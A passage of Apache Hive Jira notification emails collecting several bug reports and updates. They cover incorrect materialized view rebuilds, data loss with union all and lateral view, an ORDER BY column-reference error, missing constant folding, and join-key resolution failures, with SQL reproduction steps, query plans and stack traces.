(1, 'bob', 30.30, 2),
(1, 'bonnie', 40.30, 2);{code}

 # 
{code:java}
CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') 
AS
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}

 # 
{code:java}
show tables; {code}
 !截图.PNG!
 # Select tuples, including deletion and with VirtualColumn's, from the MV and 
source tables. We see that the MV is correctly built upon creation:
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
 !截图1.PNG!
 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
 !截图2.PNG!
 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
 !截图3.PNG!
 # Now make an insert to the LHS and a delete to the RHS source table:
{code:java}
insert into cmv_basetable_n6 values
(1, 'kevin', 50.30, 2);

DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';{code}

 # Select again to see what happened:
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_n6('acid.fetch.deleted.rows'='true'); {code}
 !截图4.PNG!
 # 
{code:java}
SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_basetable_2_n3('acid.fetch.deleted.rows'='true'); {code}
 !截图5.PNG!
 # Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, 
which is incorrect already:
{code:java}
EXPLAIN CBO
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD; {code}
 !截图6.PNG!
 # Rebuild MV and see (incorrect) results:
{code:java}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;

SELECT ROW__IS__DELETED, ROW__ID, * FROM 
cmv_mat_view_n6('acid.fetch.deleted.rows'='true');{code}
 !截图7.PNG!
 # Run MV definition directly, which outputs incorrect results because the MV 
is enabled for MV-based query rewrite, i.e., the following query will output 
what's in the MV for the time being:
{code:java}
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0; {code}
 !截图8.PNG!
 # Disable MV-based query rewrite for the MV and re-run the definition, which 
should give the correct results:
{code:java}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;

SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = 
cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;{code}
 !截图9.PNG!

h1. Note

This issue is also seen in update-incurred inserts/deletes.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-21660) Wrong result when union all and later view with explode is used

2023-11-30 Thread Chunhui Yang (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-21660?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791864#comment-17791864
 ] 

Chunhui Yang commented on HIVE-21660:
-

But I use Hive-2.3.9 and run with MapReduce not Tez,also face this question.Can 
I edit GenTezUtils.java to fix this bug?

> Wrong result when union all and later view with explode is used
> ---
>
> Key: HIVE-21660
> URL: https://issues.apache.org/jira/browse/HIVE-21660
> Project: Hive
>  Issue Type: Bug
>  Components: Physical Optimizer
>Affects Versions: 3.1.1
>Reporter: Ganesha Shreedhara
>Assignee: Ganesha Shreedhara
>Priority: Major
> Fix For: 4.0.0-alpha-1
>
> Attachments: HIVE-21660.1.patch, HIVE-21660.2.patch, HIVE-21660.patch
>
>
> There is a data loss when the data is inserted to a partitioned table using 
> union all and lateral view with explode. 
>  
> *Steps to reproduce:*
>  
> {code:java}
> create table t1 (id int, dt string);
> insert into t1 values (2, '2019-04-01');
> create table t2( id int, dates array);
> insert into t2 select 1 as id, array('2019-01-01','2019-01-02','2019-01-03') 
> as dates;
> create table dst (id int) partitioned by (dt string);
> set hive.exec.dynamic.partition.mode=nonstrict;
> set hive.exec.dynamic.partition=true;
> insert overwrite table dst partition (dt)
> select t.id, t.dt from (
> select id, dt from t1
> union all
> select id, dts as dt from t2 tt2 lateral view explode(tt2.dates) dd as dts ) 
> t;
> select * from dst;
> {code}
>  
>  
> *Actual Result:*
> {code:java}
> +--+--+
> | 2| 2019-04-01   |
> +--+--+{code}
>  
> *Expected Result* (Run only the select part from the above insert query)*:* 
> {code:java}
> +---++
> | 2     | 2019-04-01 |
> | 1     | 2019-01-01 |
> | 1     | 2019-01-02 |
> | 1     | 2019-01-03 |
> +---++{code}
>  
> Data retrieved using union all and lateral view with explode from second 
> table is missing. 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by

2023-11-30 Thread Riju Trivedi (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27923?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Riju Trivedi updated HIVE-27923:

Description: 
Query fails with 'Invalid column reference' error if the column in Order by 
clause is not referenced similar to Group By clause. Like below 2 queries will 
compile correctly but the third one will fail.
{code:java}
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`order_by_test`.`result_date`) DESC;
---Successful
CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS 
`process_date`,COUNT AS `count`
FROM `order_by_test`
GROUP BY to_date(`result_date`)
ORDER BY to_date(`result_date`) DESC;
--Successful
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`result_date`) DESC; 
--Failure
{code}
Both column name and alias use should be supported for "ORDER BY" clause.

 

  was:
Query fails with 'Invalid column reference' error if the column in Order by 
clause is not referenced similar to Group By clause. Like below 2 queries will 
compile correctly but the third one will fail.
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`order_by_test`.`result_date`) DESC;
---Successful

CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS 
`process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`result_date`)
ORDER BY to_date(`result_date`) DESC;
--Successful

CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`result_date`) DESC; 
--Failure


> Query fails with SemanticException if column referenced with name in ORDER by 
>  
> ---
>
> Key: HIVE-27923
> URL: https://issues.apache.org/jira/browse/HIVE-27923
> Project: Hive
>  Issue Type: Bug
>  Components: Logical Optimizer
>Reporter: Riju Trivedi
>Priority: Major
>
> Query fails with 'Invalid column reference' error if the column in Order by 
> clause is not referenced similar to Group By clause. Like below 2 queries 
> will compile correctly but the third one will fail.
> {code:java}
> CREATE VIEW view_order_by_test AS SELECT 
> to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count`
> FROM `order_by_test`
> GROUP BY to_date(`order_by_test`.`result_date`)
> ORDER BY to_date(`order_by_test`.`result_date`) DESC;
> ---Successful
> CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS 
> `process_date`,COUNT AS `count`
> FROM `order_by_test`
> GROUP BY to_date(`result_date`)
> ORDER BY to_date(`result_date`) DESC;
> --Successful
> CREATE VIEW view_order_by_test AS SELECT 
> to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT AS `count`
> FROM `order_by_test`
> GROUP BY to_date(`order_by_test`.`result_date`)
> ORDER BY to_date(`result_date`) DESC; 
> --Failure
> {code}
> Both column name and alias use should be supported for "ORDER BY" clause.
>  



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by

2023-11-30 Thread Riju Trivedi (Jira)
Riju Trivedi created HIVE-27923:
---

 Summary: Query fails with SemanticException if column referenced 
with name in ORDER by  
 Key: HIVE-27923
 URL: https://issues.apache.org/jira/browse/HIVE-27923
 Project: Hive
  Issue Type: Bug
  Components: Logical Optimizer
Reporter: Riju Trivedi


Query fails with 'Invalid column reference' error if the column in Order by 
clause is not referenced similar to Group By clause. Like below 2 queries will 
compile correctly but the third one will fail.
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`order_by_test`.`result_date`) DESC;
---Successful

CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS 
`process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`result_date`)
ORDER BY to_date(`result_date`) DESC;
--Successful

CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) 
AS `process_date`,COUNT(*) AS `count`
FROM `order_by_test`
GROUP BY to_date(`order_by_test`.`result_date`)
ORDER BY to_date(`result_date`) DESC; 
--Failure



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27922) Backport HMS client changes from HIVE-18755

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27922?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27922:
--
Labels: pull-request-available  (was: )

> Backport HMS client changes from HIVE-18755
> ---
>
> Key: HIVE-27922
> URL: https://issues.apache.org/jira/browse/HIVE-27922
> Project: Hive
>  Issue Type: Improvement
>Reporter: Chao Sun
>Priority: Major
>  Labels: pull-request-available
>
> This is a follow-up on HIVE-27868 to backport HMS client changes related to 
> the catalog support.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27922) Backport HMS client changes from HIVE-18755

2023-11-30 Thread Chao Sun (Jira)
Chao Sun created HIVE-27922:
---

 Summary: Backport HMS client changes from HIVE-18755
 Key: HIVE-27922
 URL: https://issues.apache.org/jira/browse/HIVE-27922
 Project: Hive
  Issue Type: Improvement
Reporter: Chao Sun


This is a follow-up on HIVE-27868 to backport HMS client changes related to the 
catalog support.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-27868) Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog in HMS 3+

2023-11-30 Thread Chao Sun (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27868?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chao Sun resolved HIVE-27868.
-
Fix Version/s: 2.3.10
 Assignee: Chao Sun
   Resolution: Fixed

> Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog 
> in HMS 3+
> ---
>
> Key: HIVE-27868
> URL: https://issues.apache.org/jira/browse/HIVE-27868
> Project: Hive
>  Issue Type: Improvement
>Reporter: Chao Sun
>Assignee: Chao Sun
>Priority: Major
>  Labels: pull-request-available
> Fix For: 2.3.10
>
>
> HIVE-18755 introduced the concept of catalog which adds another level of 
> namespace on top of tables and databases. Given HMS using Hive 3.x already 
> has this feature and Hive 2.3 client is commonly used to talk to these 
> metastores through frameworks such as Spark, this JIRA proposes to backport a 
> subset of the features to allow Hive 2.3 client to specify catalog to read 
> from the 3.x metastores.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Component/s: Hive

> Prepare for Hive 4.0.0 Release
> --
>
> Key: HIVE-27921
> URL: https://issues.apache.org/jira/browse/HIVE-27921
> Project: Hive
>  Issue Type: Task
>  Components: Hive
>Affects Versions: 4.0.0
>Reporter: Denys Kuzmenko
>Priority: Major
>
> That is an Umbrella Jira to track the activity around Hive 4.0.0 release. 
> *Please note that this is an Open forum and every input from the community is 
> welcomed.*



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Description: 
That is an Umbrella Jira to track the activity around Hive 4.0.0 release. 

*Please note that this is an Open forum and every input from the community is 
welcomed.*

> Prepare for Hive 4.0.0 Release
> --
>
> Key: HIVE-27921
> URL: https://issues.apache.org/jira/browse/HIVE-27921
> Project: Hive
>  Issue Type: Improvement
>Reporter: Denys Kuzmenko
>Priority: Major
>
> That is an Umbrella Jira to track the activity around Hive 4.0.0 release. 
> *Please note that this is an Open forum and every input from the community is 
> welcomed.*



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Affects Version/s: 4.0.0

> Prepare for Hive 4.0.0 Release
> --
>
> Key: HIVE-27921
> URL: https://issues.apache.org/jira/browse/HIVE-27921
> Project: Hive
>  Issue Type: Task
>Affects Versions: 4.0.0
>Reporter: Denys Kuzmenko
>Priority: Major
>
> That is an Umbrella Jira to track the activity around Hive 4.0.0 release. 
> *Please note that this is an Open forum and every input from the community is 
> welcomed.*



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko updated HIVE-27921:
--
Issue Type: Task  (was: Improvement)

> Prepare for Hive 4.0.0 Release
> --
>
> Key: HIVE-27921
> URL: https://issues.apache.org/jira/browse/HIVE-27921
> Project: Hive
>  Issue Type: Task
>Reporter: Denys Kuzmenko
>Priority: Major
>
> That is an Umbrella Jira to track the activity around Hive 4.0.0 release. 
> *Please note that this is an Open forum and every input from the community is 
> welcomed.*



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27921) Prepare for Hive 4.0.0 Release

2023-11-30 Thread Denys Kuzmenko (Jira)
Denys Kuzmenko created HIVE-27921:
-

 Summary: Prepare for Hive 4.0.0 Release
 Key: HIVE-27921
 URL: https://issues.apache.org/jira/browse/HIVE-27921
 Project: Hive
  Issue Type: Improvement
Reporter: Denys Kuzmenko






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Resolved] (HIVE-26630) Introduce copy-on-write DML implementations for Iceberg tables

2023-11-30 Thread Denys Kuzmenko (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-26630?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Denys Kuzmenko resolved HIVE-26630.
---
Fix Version/s: 4.0.0
 Assignee: Denys Kuzmenko  (was: Ayush Saxena)
   Resolution: Fixed

> Introduce copy-on-write DML implementations for Iceberg tables
> --
>
> Key: HIVE-26630
> URL: https://issues.apache.org/jira/browse/HIVE-26630
> Project: Hive
>  Issue Type: Improvement
>Reporter: Ádám Szita
>Assignee: Denys Kuzmenko
>Priority: Major
> Fix For: 4.0.0
>
>
> Hive currently only supports merge-on-read approach when doing 
> delete/update/merge operations on Iceberg tables. From performance point of 
> view this has the advantage on the write side and disadvantage on the read 
> side.
> We should create a copy-on-write implementation for these where the pro's and 
> con's are inverted which might suite better certain use cases.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (HIVE-27920) Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function

2023-11-30 Thread Stamatis Zampetakis (Jira)
Stamatis Zampetakis created HIVE-27920:
--

 Summary: Failed to generate OPTIMIZED SQL when running EXPLAIN 
EXTENDED on query with TO_DATE function
 Key: HIVE-27920
 URL: https://issues.apache.org/jira/browse/HIVE-27920
 Project: Hive
  Issue Type: Bug
  Components: CBO
Affects Versions: 4.0.0-beta-1
Reporter: Stamatis Zampetakis
Assignee: Stamatis Zampetakis


The problem can be reproduced in current master using the following scenario.
{code:sql}
CREATE TABLE TBL (STRING_DATE STRING);
EXPLAIN EXTENDED SELECT TO_DATE(STRING_DATE) FROM TBL;
{code}

The OPTIMIZED SQL entry is missing from the output of the EXPLAIN.
{noformat}
STAGE DEPENDENCIES:
  Stage-0 is a root stage

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: tbl
  GatherStats: false
  Select Operator
expressions: to_date(CAST( string_date AS TIMESTAMP)) (type: date)
outputColumnNames: _col0
ListSink
{noformat}

The OPTIMIZED SQL is missing cause the conversion from the CBO plan (RelNode) 
to SQL failed with the following stacktrace.
{noformat}
2023-11-30T07:11:34,486  WARN [ebc7347a-5ea2-49dc-88c8-61b25804e066 main] 
parse.CalcitePlanner: Rel2SQL Rewrite threw error
java.lang.UnsupportedOperationException: class 
org.apache.calcite.sql.SqlSyntax$6: SPECIAL
at org.apache.calcite.util.Util.needToImplement(Util.java:975) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlSyntax$6.unparse(SqlSyntax.java:116) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlOperator.unparse(SqlOperator.java:329) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:108)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlAsOperator.unparse(SqlAsOperator.java:76) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list2(SqlPrettyWriter.java:1291)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list(SqlPrettyWriter.java:1271)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.pretty.SqlPrettyWriter.list(SqlPrettyWriter.java:1068) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.SqlSelectOperator.unparse(SqlSelectOperator.java:164) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlSelect.unparse(SqlSelect.java:246) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:152) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:174) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at org.apache.calcite.sql.SqlNode.toSqlString(SqlNode.java:183) 
~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.getOptimizedSql(CalcitePlanner.java:1367)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.genOPTree(CalcitePlanner.java:660)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.SemanticAnalyzer.analyzeInternal(SemanticAnalyzer.java:13113)
 ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT]
at 
org.apache.hadoop.hive.ql.parse.CalcitePlanner.analyzeInternal(CalcitePlanner.java:465)
 

[jira] [Created] (HIVE-27919) Constant reduction in CBO does not work for FROM_UNIXTIME, DATE_ADD, DATE_SUB

2023-11-30 Thread Stamatis Zampetakis (Jira)
Stamatis Zampetakis created HIVE-27919:
--

 Summary: Constant reduction in CBO does not work for 
FROM_UNIXTIME, DATE_ADD, DATE_SUB
 Key: HIVE-27919
 URL: https://issues.apache.org/jira/browse/HIVE-27919
 Project: Hive
  Issue Type: Improvement
  Components: CBO
Affects Versions: 4.0.0-beta-1
Reporter: Stamatis Zampetakis
Assignee: Stamatis Zampetakis


Constant reduction (aka. constant folding) does not work in CBO for 
FROM_UNIXTIME, DATE_ADD, and DATE_SUB functions.

Below, we outline the result of EXPLAIN CBO and plain EXPLAIN using some 
trivial constant inputs. Notice, that constant reduction is not present in the 
CBO plan but it is applied later on by the physical optimizer.

{code:sql}
SELECT FROM_UNIXTIME(1701088643)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[FROM_UNIXTIME(1701088643)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: '2023-11-27 04:37:23' (type: string)
outputColumnNames: _col0
ListSink
{noformat}

{code:sql}
SELECT DATE_ADD('2023-01-01', 1)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[DATE_ADD(_UTF-16LE'2023-01-01':VARCHAR(2147483647) 
CHARACTER SET "UTF-16LE", 1)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: DATE'2023-01-02' (type: date)
outputColumnNames: _col0
ListSink
{noformat}

{code:sql}
SELECT DATE_SUB('2023-01-01', 1)
{code}
{noformat}
CBO PLAN:
HiveProject(_o__c0=[DATE_SUB(_UTF-16LE'2023-01-01':VARCHAR(2147483647) 
CHARACTER SET "UTF-16LE", 1)])
  HiveTableScan(table=[[_dummy_database, _dummy_table]], 
table:alias=[_dummy_table])

STAGE PLANS:
  Stage: Stage-0
Fetch Operator
  limit: -1
  Processor Tree:
TableScan
  alias: _dummy_table
  Row Limit Per Split: 1
  Select Operator
expressions: DATE'2022-12-31' (type: date)
outputColumnNames: _col0
ListSink
{noformat}
The reason is that all the functions at the moment extend 
{{SqlAbstractTimeFunction}} which is declared as a dynamic function and by 
default prevents constant folding.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-1626) stop using java.util.Stack

2023-11-30 Thread Chunhui Yang (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-1626?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chunhui Yang updated HIVE-1626:
---
Description: 
我们目前使用 Stack 作为通用节点遍历库的一部分。不应将 Stack 用于此目的,因为它从 Vector 继承会产生多余的同步开销。

大多数项目最终都会添加一个 ArrayStack 实现并改用它。

  was:
We currently use Stack as part of the generic node walking library.  Stack 
should not be used for this since its inheritance from Vector incurs 
superfluous synchronization overhead.

Most projects end up adding an ArrayStack implementation and using that instead.



> stop using java.util.Stack
> --
>
> Key: HIVE-1626
> URL: https://issues.apache.org/jira/browse/HIVE-1626
> Project: Hive
>  Issue Type: Improvement
>  Components: Query Processor
>Affects Versions: 0.7.0
>Reporter: John Sichi
>Assignee: Teddy Choi
>Priority: Major
>  Labels: pull-request-available
> Attachments: HIVE-1626.2.patch, HIVE-1626.2.patch, HIVE-1626.3.patch, 
> HIVE-1626.3.patch, HIVE-1626.3.patch
>
>  Time Spent: 2h 40m
>  Remaining Estimate: 0h
>
> 我们目前使用 Stack 作为通用节点遍历库的一部分。不应将 Stack 用于此目的,因为它从 Vector 继承会产生多余的同步开销。
> 大多数项目最终都会添加一个 ArrayStack 实现并改用它。



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27658) Error resolving join keys during conversion to dynamic partition hashjoin

2023-11-30 Thread Stamatis Zampetakis (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27658?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791647#comment-17791647
 ] 

Stamatis Zampetakis commented on HIVE-27658:


For convenience, the query in [^hive27658.q] is presented below.
{code:sql}
SELECT TC.CONST_DATE, TB.PRODUCT_SK
FROM TABLE_A TA
INNER JOIN (SELECT TO_DATE(FROM_UNIXTIME(1701088643)) AS CONST_DATE) TC
ON TA.START_DATE = TC.CONST_DATE
INNER JOIN TABLE_B TB
ON TB.START_DATE = TC.CONST_DATE AND TA.PRODUCT_ID = TB.PRODUCT_ID;{code}
The operator tree before hitting the error described above is depicted in 
[^hive27658-query-plan.pdf]. The problem is triggered while trying to convert 
the JOIN[14] operator into a dynamic partition hash join.

The dynamic partition hash join is the first operator that appears in a Reduce 
Operator Tree and the plan usually looks like the snippet below.
{noformat}
Reduce Operator Tree:
  Map Join Operator
condition map:
 Inner Join 0 to 1
keys:
  0 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint)
  1 KEY.reducesinkkey0 (type: bigint), KEY.reducesinkkey1 (type: bigint)
outputColumnNames: _col2, _col5, _col7, _col9, _col15
input vertices:
  0 Map 1
Statistics: Num rows: 1178531569624 Data size: 414666308907440 Basic stats: 
COMPLETE Column stats: COMPLETE
DynamicPartitionHashJoin: true
{noformat}
Observe that the column names for the keys are using the "KEY.reducesinkkey" 
prefix and the implementation depends on this naming convention for working 
properly.

The {{ExprNodeDescUtils#resolveJoinKeysAsRSColumns}} method tries to map the 
join keys to the output column names from the RS operators using the 
{{columnExprMap}} mapping that is present on the RS operators. In this case, it 
fails to resolve the "0 _col1 (type:int), _col2 (type: date)" keys from the 
RS[12] operator because "_col2 (type: date)" is not present in the 
{{columnExprMap}} of RS[12] thus it returns {{null}} and triggers the 
aforementioned exception.

Looking closer to RS[12] we can see that there is a slight inconsistency 
between the columnExprMap and the key expressions. The KEY.reducesinkkey1 
denotes that the input expression is a constant date but this is not reflected 
in the key expressions where _col2 is an expression referencing a column. It 
appears the constant propagation logic did not trigger completely for RS[12] 
leaving it to some intermediary state that is problematic for the dynamic 
partition hash join conversion.

> Error resolving join keys during conversion to dynamic partition hashjoin
> -
>
> Key: HIVE-27658
> URL: https://issues.apache.org/jira/browse/HIVE-27658
> Project: Hive
>  Issue Type: Bug
>  Components: Query Planning
>Affects Versions: 3.1.3, 4.0.0-beta-1
>Reporter: xiaojunxiang
>Priority: Major
> Attachments: hive27658-query-plan.pdf, hive27658.q
>
>
> In certain cases the compilation of queries fail during the conversion to a 
> dynamic partition hash join with the stacktrace similar to the one shown 
> below.
> {noformat}
> 2023-08-31T10:22:21,738 WARN  [HiveServer2-Handler-Pool: Thread-100]: 
> thrift.ThriftCLIService (()) - Error executing statement: 
> org.apache.hive.service.cli.HiveSQLException: Error while compiling 
> statement: FAILED: SemanticException Error resolving join keys
>   at 
